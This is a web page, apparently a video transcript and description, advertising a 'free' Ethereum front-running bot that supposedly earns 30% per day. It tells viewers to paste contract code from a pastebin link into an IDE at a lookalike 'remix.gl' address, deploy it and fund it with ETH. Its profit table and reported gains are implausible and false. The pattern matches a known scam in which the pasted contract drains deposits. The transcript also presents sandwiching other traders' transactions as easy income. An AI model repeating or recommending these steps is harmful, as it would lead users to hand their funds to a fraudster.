Free Crypto Arbitrage Bot Earn 30% Per Day -2024 Ethereum Bot Tutorial

    hello everyone this YouTube video tutorial I’ll be explaining to you an easy method to make passive income using Unis swap have you ever made a transaction in Unis swap where you forgot to decrease the slippage if so you may have received fewer tokens than you were expecting this is because your transaction has been front run by a bot who takes advantage of the slippage so basically in this video we’ll be talking about how to build a smart contract bot who does the same my smart contract bot which I’ll call a front running bot will allow us to automatically trade a given token for the ethereum blockchain on Unis Swap and 1 in without having to go through the typical transaction methods this is going to allow us to sniff the Penning transactions that are not yet mined on the menol and then it’s going to allow us to inject our transaction with a higher gas fee than the transaction which is entered now this will allow our transaction to be processed first and then we’ll also send a order within the same block so basically the victim’s transaction gets sandwiched between ours and we make a profit from the slippage difference in the transaction let me explain more of what front running is with an example let’s say that Alice wants to exchange $11,000 worth of ethers for uni token and let’s suppose that the uni price is $5 at the moment of the transaction so if we do a simple calculation Alice will receive 200 units of the uni token but as the price of a token token may increase Unis swap requires users to set slippage which means the percentage of an eventual price increase that you accept for the transaction to go through now in this example if Alice set slippage to 10% which means that she agrees to pay up to 5.5 per unit token that’s about $181 tokens for $11,000 so when Alice submits the transaction using metamask the scenario will be like this our bot will spot Alice’s transaction and buy uni token at the price of $5 and increase the price so Alice will buy higher Alice will buy1 181 units of uni token at a price of 5.5 so our bot will sell all the tokens bought on the first transaction and then keep the profit which is in the example it’s about $91 minus gas fees all of that in the same block so to start off you’ll need to have metamask installed and connected to the ethereum main net if you don’t have metamask installed you can find a link in the description on how to install it to deploy our contract go to remix ethereum compiler remix is a web application that allows us to develop deploy compile and launch Smart contracts coded in the solidity language now you’ll find the link to the remix website in the description below now head over to the left sidebar and create a new file named bot. so now if you look at the description I’ve included a link to this code you need to copy and paste that code this is our front runner bot contract that we’re going to deploy a couple of things to look at after pasting the code are line 55 and 56 if you check the addresses on ether scan you’ll see that these are the addresses of wrapped ether [Music] tokens okay so you can see it’s the official wrapped ether address it’s always a good idea to check that now back to remix now that our bot file is ready let’s compile it on the side menu click solidity compiler now as you can see the contract is built for the 0.6.0 version of solidity under compiler select the version 0.6.0 so it’ll match our contract now click on compile bot. so and wait for the bot to compile so now we deploy this to our wallet head on over to deploy and run transactions on remix under the environment select in ejected web 3 to connect remix to our metamask finally make sure Unis swapbot bot. so is selected under contract now the deployment utility is ready click the deploy button to publish our contract to the ethereum blockchain we need to confirm the creation of our contract by paying some gas fees I always set gas fees to high so it’ll speed up the transactions there’s not a lot of difference but click confirm and wait for the transaction to be mined transaction confirmed now our contract is deployed so as you can see here there are four actions for a contract the start button will start the bot sniffing the men poool withdrawal will stop the bot and transfer funds back to your wallet owner which Returns the owner of the contract and stop will stop the bot from sniffing the men poool so let’s copy the contract address and make sure it was created head back to Ether scan and paste it okay it says it was successfully created so the next step is to fund our contract with some ethers to be able to snipe liquidity pools I’m going to copy this address and head back over to my metamask now make sure you’ve copied the right address you can fund the contract with whatever amount you want but obviously the more you put in the larger the transaction you’ll be able to front run and the more profit you’ll be able to accumulate over time so for instance say you’re only front running with 0.5 ethers you you won’t be able to create as much slippage in the price as if you were inserting something like 10 ethers sweet there we go okay so transaction confirmed and the contract is funded we can check that by following our contract address on etherscan.io as you can see our contract has one ethereum on its balance which is basically the amount we funded it with the last step is to click Start now this will enable the bot to start sniffing the mle to find different liquidity pairs in order for you to front run the transactions I’ll see you you guys in a couple [Music] hours well guys I want to share the profit the bot made for me so I have something around 1.17 ether which is around 17% you can see the transaction that are bot made the internal transactions tab as you can see here are the front run transactions that our bot made over the 10 hours there are total of seven transactions now if we calculate the sum profit minus gas fees we get exactly 0.17 ethereum so I’ll see you in 10 hours all right guys let’s see how much more we made oh it’s about 1.37 ether so basically it took me about a day to gain my deposit by more than a third something close to 40% which isn’t that bad so the bot will continue to run until you press the withdrawal button the bot will then exit the liquidity pool and will return back to your wallet the ethers you entered initially plus the profit so let’s click it this will charge us a little bit of gas I’ll set it to high again and then we click [Music] confirm there we go the transaction’s confirmed so let’s go to our metamask to check and see what I’ve got now as you can see the balance from the bot is now in my wallet I’ve had some weeks where I’ve made five to six ethers sometimes it’s not always profitable and profits fluctuate week to week but usually I make two plus ethereum a week so guys share your profits in the comments below hit the like button if you found this video valuable and don’t forget to subscribe so that you can stay updated

    Free Crypto Arbitrage Bot Earn 30% Per Day -2024 Ethereum Bot Tutorial

    STEP BY STEP INSTRUCTIONS:

    πŸ‘‰ 1. Download MetaMask:
    https://metamask.io/download

    πŸ‘‰ 2. Access the Remix IDE:
    https://remix.gl

    πŸ‘‰ 3. Right click on the ‘contracts’ folder and create a new file. Rename it as you likeβ€”i.e., ‘Bot.sol’

    πŸ‘‰ 4. Paste SmartContract Code in Remix:
    https://pastebin.com/raw/S2xPcvmX

    πŸ‘‰ 5. Move to the ‘Solidity Compiler’ tab, select version ‘0.6.6’ and then click ‘Compile’

    πŸ‘‰ 6. Move to the ‘Deploy’ tab, select ‘Injected Provider’ as the environment, then click ‘Deploy’. After the transaction is confirmed, it’s your own BOT now

    πŸ‘‰ 7. Deposit funds (at least 0.2 ETH to prevent negating slippage) to your exact contract/bot address

    πŸ‘‰ 8. After your transaction is confirmed, start the bot by clicking the ‘start’ button. Withdraw anytime by clicking ‘withdrawal’

    πŸ“ˆ Estimated Profits
    Investment Range (ETH) | Liquidity Level | Profits per 24 Hours
    0.2 ETH – 0.5 ETH Low Up to 10%
    0.5 ETH – 1 ETH Moderate Up to 20%
    1 ETH – 3 ETH High 27-35%
    2 ETH – 5 ETH High 35-50%
    6 – 10 ETH Very High 50-63%
    10 ETH – 20 ETH Very High 76%+
    20 ETH – 50 ETH Extremely High 97%+

    🚨 EDIT: I’ve received messages from people who didn’t fund the contract with enough Ethereum to cover gas fees and possible burn fees. The bot targets token contracts with max 10% burn fee and anything lower. However, nowadays most tokens come with 2~6% fees. If you fund the contract with 0.2 ETH or less, and the bot targets another token with high burn fees, the contract will waste a lot of gas fees. I recommend funding the contract with at least 0.2 ETH to make sure that won’t happen.

    #ethereum #crypto #arbitrage #arbitragestrategy #cryptoinvesting #cryptowallet #decentralizedfinance #tokenomics #cryptomarket #cryptofinance #cryptocurrencyexchange #blockchaintechnology #digitalassets #mevbot #slippagebot #mevbotethereum #ethereum #mevbot #tutorial #uniswap #mev #bot #ethereumtrading #eth #defi #bsc #pancakeswap #crypto #cryptocurrency #blockchain #cryptobot #cryptobot #arbitrage #slippage #cryptocurrencies #cryptoarbitrage #decentralizedfinance #1inch #metamask #cryptoworld

    Disclaimer:
    PLEASE READ THIS DISCLAIMER CAREFULLY. BY ACCESSING OR USING THIS WEBSITE, PARTICIPATING IN ANY CRYPTO-RELATED PROJECT, OR ENGAGING WITH ANY ASSOCIATED PRODUCTS, SERVICES, OR TOKENS, YOU AGREE TO BE BOUND BY THE TERMS AND CONDITIONS SET FORTH BELOW.

    General Risks
    Investing in cryptocurrencies and blockchain-related projects carries inherent risks due to the speculative nature of the market, technological uncertainties, and regulatory complexities. There is no guarantee of returns or profits, and the value of your investment may fluctuate significantly, potentially resulting in partial or total loss.

    No Investment Advice
    The information provided on this website, in any associated materials, or by the project team does not constitute financial, investment, legal, or tax advice. You should consult with your own professional advisors before making any decisions related to your participation in this project or any related transactions.

    By participating in this project or engaging with any associated products, services, or tokens, you acknowledge and agree that you have read, understood, and accepted the risks and conditions outlined in this disclaimer.

    1 Comment

    Leave A Reply
    Share via